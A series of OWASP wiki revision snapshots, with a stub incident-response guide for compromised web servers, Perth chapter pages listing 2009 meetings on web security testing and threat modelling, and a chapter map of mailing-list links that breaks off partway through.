Xntrik: /* External Resources */ - added APWG Phishing Education Landing Page resource

{{Stub}}
=My server has been hacked...what do I do now?=

This page will offer suggestions and resources for identifying and eliminating threats to your web servers/applications after a suspected attack.

Anyone interested in contributing is welcome.

==Identification==

Basic principles:

* Incident identification/notification may occur from a number of information sources (events):
** Staff reporting unusual activity
** Staff, clients or public reporting a problem
** Technical teams/support discovering evidence of an incident on systems.
** Alerts from IDS, security monitoring systems or anti-virus software, Firewalls or WAFS.

* Roles:
** A Security incident owner must be assigned.
** A point of contact must be available to respond to incidents at all times.
** A security incident owner must track the security incident to remediation and resolution.

* Examples of an incident:
** Virus/malware infection
** Unauthorized system changes
** Unauthorized application/web site changes
** Unauthorized disclosure of client information or information leakage
** Theft or loss of company information/assets

* Examples of an event:
** Reports from intrusion detection system/WAF/Firewall or log scraping system
** Reports from vulnerability scanning/traffic monitoring/performance monitoring

==Assessment==

Incident severity :

Risk Rating

* '''Low''':
** Events that cannot be 100% identified as attacks and have no effect on operations;
** False activation of intrusion detection systems, WAF alerts etc
** Non-repeated scans or probing from an external uncontrolled network

* '''Medium'''
** Incidents that have no negative impact on operations. Incidents identified but unsuccessful in an attempt to actively breach information security controls from external or internal standpoint
** Repeated active probing or parameter manipulation from an external or internal source.
** Malware/rogue code/virus that has been successfully contained or removed

* '''High'''
** Incidents that have major impact to operations or corporate branding
** Evidence of insider threat with identified motivation by salaried employees or contractors

== Containment ==

Containment should be broken into proactive and reactive methods.

 

=== Proactive Methods ===

These are methods to be used in anticipation of a Web Application server compromise. Web applications have, by comparison to other server types, a much larger attack surface. This is typically because of the fact that by nature they are meant to be internet accessible and require anonymous access in order to be functional. Part of being proactive is segmentation of functions. Your web server should be separate from your application server and separate from your database server. Each tier should be divided by firewalls that only allow the necessary protocols and ports between each tier. In addition, accounts used to communicate between tiers of your web application (WA) should be implemented using the least-privelege method [http://en.wikipedia.org/wiki/Principle_of_least_privilege 1].

Additional notes:

*All tiers of the WA should be behind firewalls with egress filtering enabled.
*Your web server should never speak directly to your database server.
*All communications should be filtered by a reverse proxy when possible.
*No communications should be allowed between the DMZ segments and the internal company network.
*If database information is required to be passed into your internal network, do so in scheduled DTS packages that are strickly filtered and scrutinized by internal systems
*Assume all data in the DMZ is compromised. Treat as such on each tier. The database server should not blindly trust input from other tiers.
*Use paramerized stored procedures to interact with the database

=== Reactive Methods ===

Assuming your proactive methods are in place, you simply need to identify the point of entry, restore the server and applications and close the vulnerability that led to the compromise. 

In a scenario where your WA is not properly segmented, you'll need to identify the system where the entry point exists and isolate that system. This is typically the point that some rudamentery forensics is required in order to determine the scope of the breach, time exposed, and other details. This is discussed in more detail in the forensics section.

Depending on your research, you may find that attempts were made to expand the level of the breach. In this case, you'll need to quickly determine an area of effect. This type of "hacking triage" can be performed by analyzing paths in the network that the attacker most likely took. This can be difficult depending on the network design. The best point to make this evaluation is at the egress point of the network. If out-bound web traffic is proxied, then proxy logs would be a great place to start. Egress firewall logs, IDS logs, and any other type of outbound traffic analysis will provide the most detail. This should provide you a list of compromised machines that you can address quickly.

This is also the point where you, your legal team, and your organizations leadership will need to make a few critical decisions:

*Does this breach require customer/FED notification (typically when it involves regulated data such as PII)
*Do you want to pursue legal prosecution of the attacker? If so, evidence collection should be the next priority above containing the breach.
*Put your hands on your recovery plan, and make sure anything required within is accessible

== Evidence Collection ==

What evidence you collect will be largely determined by your goal in collecting evidence in the first place. There are two primary reasons for collective evidence:

=== Evidence for Incident Analysis ===

=== Evidence for Prosecution ===

==Forensic Analysis==
==Investigation==
==Incident Follow-up==
==Lessons Learned==
==Event Correlation and Aggregation (Streamlining)==

==External Resources==
* [http://www.zeltser.com/network-os-security/security-incident-survey-cheat-sheet.pdf Cheat Sheet for Server Admin.]
* [http://www.ucl.ac.uk/cert/win_intrusion.pdf Checking Microsoft Windows® Systems for Signs of Compromise]
* [http://www.zeltser.com/network-os-security/security-incident-questionnaire-cheat-sheet.pdf SECURITY INCIDENT QUESTIONNAIRE FOR RESPONDERS]
* [http://sans.org/resources/winsacheatsheet.pdf SAN's SysAdmin Cheat Sheet]
* http://usa.visa.com/download/merchants/cisp_what_to_do_if_compromised.pdf
* http://usa.visa.com/download/merchants/cisp_responding_to_a_data_breach.pdf
* [http://www.antiphishing.org/reports/APWG_CMU_Landing_Pages_Project.pdf Anti Phishing Working Group / Carnegie Mellon University - Phishing Education Landing Page Project]

==Questions to Ask==
* Was card data compromised?
* Do you need professional legal advice?

Perth Australia

2010-01-02T06:56:42Z

Xntrik: Updated the previous meetings section

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2009-11-20T01:12:31Z

Xntrik: Updated with link to Brochure

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Perth OWASP - Perth AISA Technical Day ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

==== Details ====

'''Date: Friday 4th December, 2009'''
'''Time: From 9.15am until 4.30pm (if you stay for the entire day)'''
'''Location: [http://maps.google.com.au/maps?f=q&source=s_q&hl=en&geocode=&q=2+Bradford+Street,+Mount+Lawley,+WA+6050&ie=UTF8&hq=&hnear=2+Bradford+St,+Mt+Lawley+WA+6050&z=16 Edith Cowan University, 2 Bradford Street, Mount Lawley, WA 6050]'''
'''Registration: [http://eventarc.com/view/95/inagrual-aisa-perth-technical-security-day here]'''

== Previous OWASP Meetings ==

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

File:AISA Perth TSD 2009 Brochure -Final.pdf

2009-11-20T01:10:38Z

Xntrik:

Perth Australia

2009-11-18T13:59:26Z

Xntrik: Updated with details for the Perth AISA Tech day

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Perth OWASP - Perth AISA Technical Day ===

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

==== Details ====

'''Date: Friday 4th December, 2009'''
'''Time: From 9.15am until 4.30pm (if you stay for the entire day)'''
'''Location: [http://maps.google.com.au/maps?f=q&source=s_q&hl=en&geocode=&q=2+Bradford+Street,+Mount+Lawley,+WA+6050&ie=UTF8&hq=&hnear=2+Bradford+St,+Mt+Lawley+WA+6050&z=16 Edith Cowan University, 2 Bradford Street, Mount Lawley, WA 6050]'''
'''Registration: [http://eventarc.com/view/95/inagrual-aisa-perth-technical-security-day here]'''

== Previous OWASP Meetings ==

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Owasp around the world

2009-09-29T23:33:02Z

Xntrik: (forgot name for link)

<googlemap version="0.9" lat="10.141932" lon="1.40625" type="terrain" zoom="2" width="1000" height="500">
(O) 39.202016, -76.859368, Columbia,MD
OWASP Headquarters

(C) 33.8164,-84.3320,atlanta
[http://lists.owasp.org/mailman/listinfo/owasp-atlanta Mailing List]

(C) 48,16,vienna
[http://lists.owasp.org/mailman/listinfo/owasp-vienna Mailing List]

(C) 10.76,78.7,bangalore
[http://lists.owasp.org/mailman/listinfo/owasp-bangalore Mailing List]

(C) 50.9,4.5,belgium
[http://lists.owasp.org/mailman/listinfo/owasp-belgium Mailing List]

(C) 42.378,-71.2277,boston
[http://lists.owasp.org/mailman/listinfo/owasp-boston Mailing List]

(C) 42.9408,-78.7358,buffalo
[http://lists.owasp.org/mailman/listinfo/owasp-buffalo Mailing List]

(C) 35.1313,-80.7675,charlotte
[http://lists.owasp.org/mailman/listinfo/owasp-charlotte Mailing List]

(C) 41.9235,-88.2190,chicago
[http://lists.owasp.org/mailman/listinfo/owasp-chicago Mailing List]

(C) 40.0537,-83.0725,ohio
[http://lists.owasp.org/mailman/listinfo/owasp-ohio Mailing List]

(C) 28,77,delhi
[http://lists.owasp.org/mailman/listinfo/owasp-delhiMailing List]

(C) 26.1000,-80.2167,florida
[http://lists.owasp.org/mailman/listinfo/owasp-florida Mailing List]

(C) 50,8,germany
[http://lists.owasp.org/mailman/listinfo/owasp-germany Mailing List]

(C) 37,23,greece
[http://lists.owasp.org/mailman/listinfo/owasp-greece Mailing List]

(C) 22,114,hongkong
[http://lists.owasp.org/mailman/listinfo/owasp-hongkong Mailing List]

(C) 21,79.05,hyberabad
[http://lists.owasp.org/mailman/listinfo/owasp-hyderabad Mailing List]

(C) 8,76,kerala
[http://lists.owasp.org/mailman/listinfo/owasp-kerala Mailing List]

(C) 22,88,kolkata
[http://lists.owasp.org/mailman/listinfo/owasp-kolkata Mailing List]

(C) 53,-6,ireland
[http://lists.owasp.org/mailman/listinfo/owasp-ireland Mailing List]

(C) 31,35,israel
[http://lists.owasp.org/mailman/listinfo/owasp-israel Mailing List]

(C) 45,9,italy
[http://lists.owasp.org/mailman/listinfo/owasp-italy Mailing List]

(C) 39.1391,-94.6920,kansascity
[http://lists.owasp.org/mailman/listinfo/owasp-kansascity Mailing List]

(C) 51,0,london
[http://lists.owasp.org/mailman/listinfo/owasp-london Mailing List]

(C) 34.0522342,-118.2436849,Los Angeles
[http://lists.owasp.org/mailman/listinfo/owasp-losangeles Mailing List]

(C) 43.023200,-89.499200,madison
[http://lists.owasp.org/mailman/listinfo/owasp-madison Mailing List]

(C) -37,144,australia
[http://lists.owasp.org/mailman/listinfo/owasp-australia Mailing List]

(C) 19.43,-99.07,mexicocity
[http://lists.owasp.org/mailman/listinfo/owasp-mexicocity Mailing List]

(C) 44.9905,-93.0766,twincities
[http://lists.owasp.org/mailman/listinfo/owasp-twincities Mailing List]

(C) 18.9,72.8,mumbai
[http://lists.owasp.org/mailman/listinfo/owasp-mumbai Mailing List]

(C) 39.8435,-74.1530,nnj
[http://lists.owasp.org/mailman/listinfo/owasp-nnj Mailing List]

(C) 52,4,netherlands
[http://lists.owasp.org/mailman/listinfo/owasp-netherlands Mailing List]

(C) 40.7480,-73.7655,newjersey
[http://lists.owasp.org/mailman/listinfo/owasp-new-york Mailing List]

(C) 43.3453,-96.4430,southdakota
[http://lists.owasp.org/mailman/listinfo/owasp-south_dakota Mailing List]

(C) 41.2895,-96.0437,omaha
[http://lists.owasp.org/mailman/listinfo/owasp-omaha Mailing List]

(C) -32,116,perth
[http://lists.owasp.org/mailman/listinfo/owasp-Perth Mailing List]

(C) 40.1608,-74.9187,philadelphia
[http://lists.owasp.org/mailman/listinfo/owasp-philadelphia Mailing List]

(C) 40.3047,-80.0713,pittsburgh
[http://lists.owasp.org/mailman/listinfo/owasp-pittsburgh Mailing List]

(C) 9,-79.5,panama
[http://lists.owasp.org/mailman/listinfo/owasp-panama Mailing List]

(C) 43.2,-77.6,rochester
[http://lists.owasp.org/mailman/listinfo/owasp-rochester Mailing List]

(C) 38.6,-121.5,sacramento
[http://lists.owasp.org/mailman/listinfo/owasp-sacramento Mailing List]

(C) 38.6,-90.2,stlouis
[http://lists.owasp.org/mailman/listinfo/owasp-stlouis Mailing List]

(C) 29.5,-98.5,sanantonio
[http://lists.owasp.org/mailman/listinfo/owasp-sanantonio Mailing List]

(C) 37.8,-122.4,san-fran
[http://lists.owasp.org/mailman/listinfo/owasp-san-fran Mailing List]

(C) 37.3,-121.9,sanjose
[http://lists.owasp.org/mailman/listinfo/owasp-sanjose Mailing List]

(C) 47.6,-122.3,seattle
[http://lists.owasp.org/mailman/listinfo/owasp-seattle Mailing List]

(C) 1,103,singapore
[http://lists.owasp.org/mailman/listinfo/owasp-singapore Mailing List]

(C) 47,8,switzerland
[http://lists.owasp.org/mailman/listinfo/owasp-switzerland Mailing List]

(C) -34,151,sydney
[http://lists.owasp.org/mailman/listinfo/owasp-sydney Mailing List]

(C) 35.1,-90,memphis
[http://lists.owasp.org/mailman/listinfo/owasp-memphis Mailing List]

(C) 35,139,tokyo
[http://lists.owasp.org/mailman/listinfo/owasp-tokyo Mailing List]

(C) 43.6,-79.4,toronto
[http://lists.owasp.org/mailman/listinfo/owasp-toronto Mailing List]

(C) 39,32,turkey
[http://lists.owasp.org/mailman/listinfo/owasp-turkey Mailing List]

(C) 39.170070,-76.848333,washington
[http://lists.owasp.org/mailman/listinfo/owasp-washington Mailing List]

(C) 49.8,-97,winnipeg
[http://lists.owasp.org/mailman/listinfo/owasp-winnipeg Mailing List]

(C) 14,120,manila
[http://lists.owasp.org/mailman/listinfo/owasp-manila Mailing List]

(C) 3,101,malaysia
[http://lists.owasp.org/mailman/listinfo/owasp-malaysia Mailing List]

(C) 38.8,-77.4,wash_dc_va
[http://lists.owasp.org/mailman/listinfo/owasp-wash_dc_va Mailing List]

(C) 45,-76,ottawa
[http://lists.owasp.org/mailman/listinfo/owasp-ottawa Mailing List]

(C) 49,-123,vancouver
[http://lists.owasp.org/mailman/listinfo/owasp-vancouver Mailing List]

(C) 42,-71.227,bostonfinancialdist
[http://lists.owasp.org/mailman/listinfo/owasp-bostonfinancialdist Mailing List]

(C) 41.3,2.1,spain
[http://lists.owasp.org/mailman/listinfo/owasp-spain Mailing List]

(C) -34.5667,-58.4167,argentina
[http://lists.owasp.org/mailman/listinfo/owasp-Argentina Mailing List]

(C) 41.5,-81.7,cleveland
[http://lists.owasp.org/mailman/listinfo/owasp-cleveland Mailing List]

(C) -15.47,-47.55,brazil (Brasilia)
[http://lists.owasp.org/mailman/listinfo/owasp-brazil Mailing List]

(C) -33.27,-70.4,chile
[http://lists.owasp.org/mailman/listinfo/owasp-chile Mailing List]

(C) 24.64,46.77,riyadh
[http://lists.owasp.org/mailman/listinfo/owasp-riyadh Mailing List]

(C) 5,-74.48,colombia
[http://lists.owasp.org/mailman/listinfo/owasp-colombia Mailing List]

(C) 24.48,66.59,pakistan
[http://lists.owasp.org/mailman/listinfo/owasp-pakistan Mailing List]

(C) 55.41,12.31,denmark
[http://lists.owasp.org/mailman/listinfo/owasp-denmark Mailing List]

(C) 53.34,-113.31,edmonton
[http://lists.owasp.org/mailman/listinfo/owasp-edmonton Mailing List]

(C) 29.46,-95.22,houston
[http://lists.owasp.org/mailman/listinfo/owasp-houston Mailing List]

(C) 30.2669,-97.7429,austin
[http://lists.owasp.org/mailman/listinfo/owasp-austin Mailing List]

(C) -27.718,153.240,brisbane
[http://lists.owasp.org/mailman/listinfo/owasp-brisbane Mailing List]

(C) 22.57,120.12,taiwan
[http://lists.owasp.org/mailman/listinfo/owasp-taiwan Mailing List]

(C) 40.7,-73.9,longisland
[http://lists.owasp.org/mailman/listinfo/owasp-longisland Mailing List]

(C) 60.39,25.51,helsinki
[http://lists.owasp.org/mailman/listinfo/owasp-helsinki Mailing List]

(C) 39.856,-104.97,denver
[http://lists.owasp.org/mailman/listinfo/owasp-denver Mailing List]

(C) 36.17,-86.78,nashville
[http://lists.owasp.org/mailman/listinfo/owasp-nashville Mailing List]

(C) 33.669,-111.948,phoenix
[http://lists.owasp.org/mailman/listinfo/owasp-phoenix Mailing List]

(C) 13,80.2,chennai
[http://lists.owasp.org/mailman/listinfo/owasp-chennai Mailing List]

(C) 48.8167,2.3167,france
[http://lists.owasp.org/mailman/listinfo/owasp-france Mailing List]

(C) 29.2,48,kuwait
[http://lists.owasp.org/mailman/listinfo/owasp-kuwait Mailing List]

(C) -36.51,174.47,newzealand
[http://lists.owasp.org/mailman/listinfo/owasp-newzealand Mailing List]

(C) 37.25,127,southkorea
[http://lists.owasp.org/mailman/listinfo/owasp-southkorea Mailing List]

(C) 18.32,73.51,pune
[http://lists.owasp.org/mailman/listinfo/owasp-pune Mailing List]

(C) 41.3,2.1,spanish
[http://lists.owasp.org/mailman/listinfo/owasp-spanish Mailing List]

(C) 51.1,-114,calgary
[http://lists.owasp.org/mailman/listinfo/owasp-calgary Mailing List]

(C) 38.7039,-9.0359,portuguese
[http://lists.owasp.org/mailman/listinfo/owasp-portuguese Mailing List]

(C) 32.7,-117.2,sandiego
[http://lists.owasp.org/mailman/listinfo/owasp-sandiego Mailing List]

(C) 23.1,72.6,ahmedabad
[http://lists.owasp.org/mailman/listinfo/owasp-ahmedabad Mailing List]

(C) 33.57,-86.75,alabama
[https://lists.owasp.org/mailman/listinfo/owasp-alabama Mailing List]

(C) 56.4,23.44,latvia
[http://lists.owasp.org/mailman/listinfo/owasp-latvia Mailing List]

(C) 59.2,18.03,sweden
[http://lists.owasp.org/mailman/listinfo/owasp-sweden Mailing List]

(C) 39.8,-84.3,cincinnati
[http://lists.owasp.org/mailman/listinfo/owasp-cincinnati Mailing List]

(C) -23.32208,-46.757812,sanpaulo
[http://lists.owasp.org/mailman/listinfo/owasp-sanpaulo Mailing List]

(C) 40.0537,-83.0725,columbus
[http://lists.owasp.org/mailman/listinfo/owasp-columbus Mailing List]

(C) 33.72,-118.030,orange_county
[http://lists.owasp.org/mailman/listinfo/owasp-orange_county Mailing List]

(C) 50.067021,19.920438,poland
[http://lists.owasp.org/mailman/listinfo/owasp-poland Mailing List]

(C) 13.44,100.3,thailand
[http://lists.owasp.org/mailman/listinfo/owasp-thailand Mailing List]

(C) 9.05,7.32,nigeria
[http://lists.owasp.org/mailman/listinfo/owasp-nigeria Mailing List]

(C) 10.759,106.662,vietnam
[http://lists.owasp.org/mailman/listinfo/owasp-vietnam Mailing List]

(C) 22.541,114.054,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 31.208,121.503,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 39.892,116.389,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 44.05,-123.09,eugene
[http://lists.owasp.org/mailman/listinfo/owasp-eugene Mailing List]

(C) 41.44,-72.39,hartford
[http://lists.owasp.org/mailman/listinfo/owasp-hartford Mailing List]

(C) 33.57,-86.75,alabama
[https://lists.owasp.org/mailman/listinfo/owasp-alabama Mailing List]

(C) 21.18,-157.51,hawaii
[https://lists.owasp.org/mailman/listinfo/owasp-hawaii Mailing List]

(C) 27.382893,-82.4356,suncoast
[https://lists.owasp.org/mailman/listinfo/owasp-suncoast Mailing List]

(M) 49.467232, 11.085205, OWASP_AppSec_Germany_2009_Conference

(C) 31.194008, 29.959717,egypt
[https://lists.owasp.org/mailman/listinfo/owasp-egypt Mailing List]
</googlemap>

Owasp around the world

2009-09-29T23:31:55Z

Xntrik: added Perth chapter

<googlemap version="0.9" lat="10.141932" lon="1.40625" type="terrain" zoom="2" width="1000" height="500">
(O) 39.202016, -76.859368, Columbia,MD
OWASP Headquarters

(C) 33.8164,-84.3320,atlanta
[http://lists.owasp.org/mailman/listinfo/owasp-atlanta Mailing List]

(C) 48,16,vienna
[http://lists.owasp.org/mailman/listinfo/owasp-vienna Mailing List]

(C) 10.76,78.7,bangalore
[http://lists.owasp.org/mailman/listinfo/owasp-bangalore Mailing List]

(C) 50.9,4.5,belgium
[http://lists.owasp.org/mailman/listinfo/owasp-belgium Mailing List]

(C) 42.378,-71.2277,boston
[http://lists.owasp.org/mailman/listinfo/owasp-boston Mailing List]

(C) 42.9408,-78.7358,buffalo
[http://lists.owasp.org/mailman/listinfo/owasp-buffalo Mailing List]

(C) 35.1313,-80.7675,charlotte
[http://lists.owasp.org/mailman/listinfo/owasp-charlotte Mailing List]

(C) 41.9235,-88.2190,chicago
[http://lists.owasp.org/mailman/listinfo/owasp-chicago Mailing List]

(C) 40.0537,-83.0725,ohio
[http://lists.owasp.org/mailman/listinfo/owasp-ohio Mailing List]

(C) 28,77,delhi
[http://lists.owasp.org/mailman/listinfo/owasp-delhiMailing List]

(C) 26.1000,-80.2167,florida
[http://lists.owasp.org/mailman/listinfo/owasp-florida Mailing List]

(C) 50,8,germany
[http://lists.owasp.org/mailman/listinfo/owasp-germany Mailing List]

(C) 37,23,greece
[http://lists.owasp.org/mailman/listinfo/owasp-greece Mailing List]

(C) 22,114,hongkong
[http://lists.owasp.org/mailman/listinfo/owasp-hongkong Mailing List]

(C) 21,79.05,hyberabad
[http://lists.owasp.org/mailman/listinfo/owasp-hyderabad Mailing List]

(C) 8,76,kerala
[http://lists.owasp.org/mailman/listinfo/owasp-kerala Mailing List]

(C) 22,88,kolkata
[http://lists.owasp.org/mailman/listinfo/owasp-kolkata Mailing List]

(C) 53,-6,ireland
[http://lists.owasp.org/mailman/listinfo/owasp-ireland Mailing List]

(C) 31,35,israel
[http://lists.owasp.org/mailman/listinfo/owasp-israel Mailing List]

(C) 45,9,italy
[http://lists.owasp.org/mailman/listinfo/owasp-italy Mailing List]

(C) 39.1391,-94.6920,kansascity
[http://lists.owasp.org/mailman/listinfo/owasp-kansascity Mailing List]

(C) 51,0,london
[http://lists.owasp.org/mailman/listinfo/owasp-london Mailing List]

(C) 34.0522342,-118.2436849,Los Angeles
[http://lists.owasp.org/mailman/listinfo/owasp-losangeles Mailing List]

(C) 43.023200,-89.499200,madison
[http://lists.owasp.org/mailman/listinfo/owasp-madison Mailing List]

(C) -37,144,australia
[http://lists.owasp.org/mailman/listinfo/owasp-australia Mailing List]

(C) 19.43,-99.07,mexicocity
[http://lists.owasp.org/mailman/listinfo/owasp-mexicocity Mailing List]

(C) 44.9905,-93.0766,twincities
[http://lists.owasp.org/mailman/listinfo/owasp-twincities Mailing List]

(C) 18.9,72.8,mumbai
[http://lists.owasp.org/mailman/listinfo/owasp-mumbai Mailing List]

(C) 39.8435,-74.1530,nnj
[http://lists.owasp.org/mailman/listinfo/owasp-nnj Mailing List]

(C) 52,4,netherlands
[http://lists.owasp.org/mailman/listinfo/owasp-netherlands Mailing List]

(C) 40.7480,-73.7655,newjersey
[http://lists.owasp.org/mailman/listinfo/owasp-new-york Mailing List]

(C) 43.3453,-96.4430,southdakota
[http://lists.owasp.org/mailman/listinfo/owasp-south_dakota Mailing List]

(C) 41.2895,-96.0437,omaha
[http://lists.owasp.org/mailman/listinfo/owasp-omaha Mailing List]

(C) -32,116,perth
[http://lists.owasp.org/mailman/listinfo/owasp-Perth]

(C) 40.1608,-74.9187,philadelphia
